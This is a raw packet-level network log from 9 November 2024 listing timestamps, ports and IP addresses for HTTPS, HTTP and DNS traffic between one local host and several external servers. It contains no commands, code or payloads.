Nov 9, 2024 02:47:27.847295046 CET	443	49780	94.245.104.56	192.168.2.7
Nov 9, 2024 02:47:27.847352028 CET	49780	443	192.168.2.7	94.245.104.56
Nov 9, 2024 02:47:27.847992897 CET	49795	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.848010063 CET	443	49795	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.848448038 CET	49796	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.848467112 CET	443	49796	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.849136114 CET	49797	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.849160910 CET	443	49797	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.849215031 CET	49797	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.849303007 CET	49798	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.849314928 CET	443	49798	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.849370003 CET	49798	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.849446058 CET	49798	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.849461079 CET	443	49798	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.849464893 CET	49797	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.849478006 CET	443	49797	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.852953911 CET	49799	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.852962971 CET	443	49799	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.853034973 CET	49799	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.853219986 CET	49799	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:27.853230000 CET	443	49799	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:27.955131054 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:27.955183029 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:27.955255985 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:27.988909006 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:27.988928080 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:28.004550934 CET	80	49749	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:28.004601002 CET	49749	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:28.572861910 CET	443	49795	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.573292971 CET	443	49798	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.581535101 CET	49795	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.581553936 CET	443	49795	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.582254887 CET	49795	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.582262039 CET	443	49795	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.582654953 CET	49798	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.582691908 CET	443	49798	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.583132982 CET	49798	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.583141088 CET	443	49798	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.583841085 CET	443	49797	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.584709883 CET	49797	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.584748983 CET	443	49797	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.585194111 CET	49797	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.585201025 CET	443	49797	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.587028980 CET	443	49796	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.587486029 CET	49796	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.587501049 CET	443	49796	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.588011980 CET	49796	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.588016987 CET	443	49796	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.601351023 CET	443	49799	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.601717949 CET	49799	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.601737022 CET	443	49799	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.602256060 CET	49799	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.602261066 CET	443	49799	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.708312035 CET	443	49795	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.708425045 CET	443	49795	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.708477020 CET	49795	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.708878040 CET	49795	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.708895922 CET	443	49795	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.708908081 CET	49795	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.708914042 CET	443	49795	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.711231947 CET	443	49798	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.711293936 CET	443	49798	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.711339951 CET	49798	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.713748932 CET	443	49797	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.713804007 CET	443	49797	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.713855982 CET	49797	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.717675924 CET	443	49796	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.717729092 CET	443	49796	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.717834949 CET	49796	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.728142977 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:28.728152990 CET	443	49813	18.244.18.27	192.168.2.7
Nov 9, 2024 02:47:28.728221893 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:28.730046988 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:28.730055094 CET	443	49813	18.244.18.27	192.168.2.7
Nov 9, 2024 02:47:28.735980988 CET	443	49799	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.736032009 CET	443	49799	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.736079931 CET	49799	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.737763882 CET	49798	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.737782001 CET	443	49798	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.739303112 CET	49799	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.739310980 CET	443	49799	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.739331007 CET	49799	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.739335060 CET	443	49799	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.740135908 CET	49797	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.740144014 CET	443	49797	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.740158081 CET	49797	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.740161896 CET	443	49797	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.742412090 CET	49796	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.742418051 CET	443	49796	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.742427111 CET	49796	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.742432117 CET	443	49796	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.746407986 CET	49817	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.746423960 CET	443	49817	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.746560097 CET	49817	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.753742933 CET	49817	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.753755093 CET	443	49817	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.755300045 CET	49818	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.755311012 CET	443	49818	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.755373001 CET	49818	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.756988049 CET	49818	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.756999016 CET	443	49818	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.764830112 CET	49819	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.764859915 CET	443	49819	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.764924049 CET	49819	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.765428066 CET	49819	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.765441895 CET	443	49819	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.766241074 CET	49820	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.766253948 CET	443	49820	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.766309977 CET	49820	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.766519070 CET	49820	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.766529083 CET	443	49820	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.768296957 CET	49821	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.768316984 CET	443	49821	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:28.768366098 CET	49821	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.776309967 CET	49821	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:28.776328087 CET	443	49821	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.105146885 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:29.105218887 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:29.477991104 CET	443	49817	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.493055105 CET	443	49818	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.497838974 CET	443	49819	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.514636040 CET	443	49820	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.528084993 CET	443	49821	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.540518045 CET	49817	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.577203989 CET	443	49813	18.244.18.27	192.168.2.7
Nov 9, 2024 02:47:29.581099033 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:29.581109047 CET	443	49813	18.244.18.27	192.168.2.7
Nov 9, 2024 02:47:29.582174063 CET	443	49813	18.244.18.27	192.168.2.7
Nov 9, 2024 02:47:29.582240105 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:29.589648008 CET	49818	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.589663029 CET	49819	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.590879917 CET	49820	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.590881109 CET	49821	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.619904995 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:29.620018959 CET	443	49813	18.244.18.27	192.168.2.7
Nov 9, 2024 02:47:29.777491093 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:29.777508020 CET	443	49813	18.244.18.27	192.168.2.7
Nov 9, 2024 02:47:29.900605917 CET	49821	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.900639057 CET	443	49821	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.903043032 CET	49821	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.903048992 CET	443	49821	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.903870106 CET	49820	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.903888941 CET	443	49820	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.904114962 CET	49818	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.904125929 CET	443	49818	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.904356003 CET	49820	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.904361963 CET	443	49820	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.904586077 CET	49817	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.904623032 CET	443	49817	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.904823065 CET	49818	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.904827118 CET	443	49818	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.905002117 CET	49817	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.905006886 CET	443	49817	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.905617952 CET	49819	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.905628920 CET	443	49819	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.905986071 CET	49819	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:29.905989885 CET	443	49819	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:29.979305029 CET	49813	443	192.168.2.7	18.244.18.27
Nov 9, 2024 02:47:30.015475988 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.015489101 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.015933037 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.017427921 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.017498016 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.017520905 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.028491020 CET	443	49817	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.028624058 CET	443	49817	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.028700113 CET	49817	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.029982090 CET	443	49818	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.030090094 CET	443	49818	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.030211926 CET	49818	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.032144070 CET	443	49821	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.032206059 CET	443	49821	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.032296896 CET	49821	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.032694101 CET	443	49820	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.032886028 CET	443	49820	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.032933950 CET	49820	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.035161972 CET	443	49819	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.038609982 CET	443	49819	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.038696051 CET	49819	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.141305923 CET	49820	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.141315937 CET	443	49820	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.141329050 CET	49820	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.141331911 CET	49817	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.141334057 CET	443	49820	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.141331911 CET	49817	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.141369104 CET	443	49817	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.141380072 CET	443	49817	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.142384052 CET	49819	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.142406940 CET	443	49819	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.142421007 CET	49819	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.142430067 CET	443	49819	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.143316984 CET	49818	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.143327951 CET	443	49818	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.143338919 CET	49818	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.143343925 CET	443	49818	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.143467903 CET	49821	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.143475056 CET	443	49821	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.170028925 CET	49824	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.170047045 CET	443	49824	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.170131922 CET	49824	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.170439959 CET	49825	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.170478106 CET	443	49825	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.170546055 CET	49825	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.200289011 CET	49824	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.200300932 CET	443	49824	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.200615883 CET	49825	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.200632095 CET	443	49825	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.223310947 CET	49826	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.223329067 CET	443	49826	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.223407984 CET	49826	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.225662947 CET	49826	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.225672007 CET	443	49826	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.225775003 CET	49827	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.225804090 CET	443	49827	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.225857973 CET	49827	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.226011992 CET	49827	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.226023912 CET	443	49827	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.228377104 CET	49828	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.228395939 CET	443	49828	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.228634119 CET	49828	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.234585047 CET	49828	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:30.234596968 CET	443	49828	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.270379066 CET	52974	53	192.168.2.7	1.1.1.1
Nov 9, 2024 02:47:30.275199890 CET	53	52974	1.1.1.1	192.168.2.7
Nov 9, 2024 02:47:30.275264978 CET	52974	53	192.168.2.7	1.1.1.1
Nov 9, 2024 02:47:30.286302090 CET	53	52974	1.1.1.1	192.168.2.7
Nov 9, 2024 02:47:30.431688070 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.557972908 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.558036089 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.558857918 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.558866024 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.558877945 CET	49802	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.558882952 CET	443	49802	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.602529049 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.602559090 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.602631092 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.604379892 CET	52976	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.604393959 CET	443	52976	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.675733089 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.675754070 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.675935030 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.677155972 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:30.677186966 CET	443	52978	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:30.677243948 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:30.677757025 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:30.677789927 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:30.677845955 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:30.678153038 CET	52979	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:30.678160906 CET	443	52979	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:30.678478003 CET	52978	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:30.678495884 CET	443	52978	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:30.679845095 CET	52977	443	192.168.2.7	40.126.32.68
Nov 9, 2024 02:47:30.679857969 CET	443	52977	40.126.32.68	192.168.2.7
Nov 9, 2024 02:47:30.698115110 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:30.698152065 CET	443	52981	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:30.698205948 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:30.699289083 CET	52981	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:30.699301958 CET	443	52981	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:30.763109922 CET	49749	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:30.763716936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:30.768688917 CET	80	49749	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:30.769206047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:30.769293070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:30.770186901 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:30.770242929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:30.774940014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:30.775013924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:30.775103092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:30.775115013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:30.907957077 CET	52974	53	192.168.2.7	1.1.1.1
Nov 9, 2024 02:47:30.913193941 CET	53	52974	1.1.1.1	192.168.2.7
Nov 9, 2024 02:47:30.913248062 CET	52974	53	192.168.2.7	1.1.1.1
Nov 9, 2024 02:47:30.920449972 CET	443	49824	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.940212011 CET	443	49825	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.949635029 CET	443	49827	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.964186907 CET	443	49826	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:30.972510099 CET	443	49828	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.001893044 CET	49828	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.001908064 CET	443	49828	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.002717972 CET	49828	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.002723932 CET	443	49828	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.003242016 CET	49826	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.003257036 CET	443	49826	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.003925085 CET	49826	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.003931046 CET	443	49826	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.004395008 CET	49824	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.004407883 CET	443	49824	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.005016088 CET	49824	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.005021095 CET	443	49824	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.005635977 CET	49825	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.005660057 CET	443	49825	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.006311893 CET	49825	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.006318092 CET	443	49825	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.006844997 CET	49827	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.006859064 CET	443	49827	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.007514000 CET	49827	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.007518053 CET	443	49827	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.085057020 CET	49677	443	192.168.2.7	20.50.201.200
Nov 9, 2024 02:47:31.126382113 CET	443	49828	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.126836061 CET	443	49828	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.126892090 CET	49828	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.129164934 CET	443	49824	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.129426003 CET	443	49824	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.129483938 CET	49824	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.130702019 CET	49828	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.130711079 CET	443	49828	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.130721092 CET	49828	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.130724907 CET	443	49828	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.132236958 CET	443	49826	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.132350922 CET	443	49826	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.132519960 CET	49826	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.133002996 CET	49826	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.133013964 CET	443	49826	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.133050919 CET	49826	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.133057117 CET	443	49826	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.133523941 CET	443	49825	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.133788109 CET	443	49825	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.134119987 CET	49825	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.134785891 CET	49824	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.134802103 CET	443	49824	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.134860039 CET	49824	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.134865046 CET	443	49824	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.136476040 CET	49825	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.136496067 CET	443	49825	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.140877962 CET	52986	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.140878916 CET	52987	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.140887976 CET	443	52986	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.140897036 CET	443	52987	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.140965939 CET	52986	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.140966892 CET	52987	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.142544985 CET	52988	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.142555952 CET	443	52988	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.142601967 CET	443	49827	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.142628908 CET	52988	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.142729044 CET	443	49827	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.142851114 CET	52986	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.142862082 CET	443	52986	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:31.142890930 CET	49827	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.142988920 CET	49827	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:31.142999887 CET	443	49827	13.107.246.45	192.168.2.7
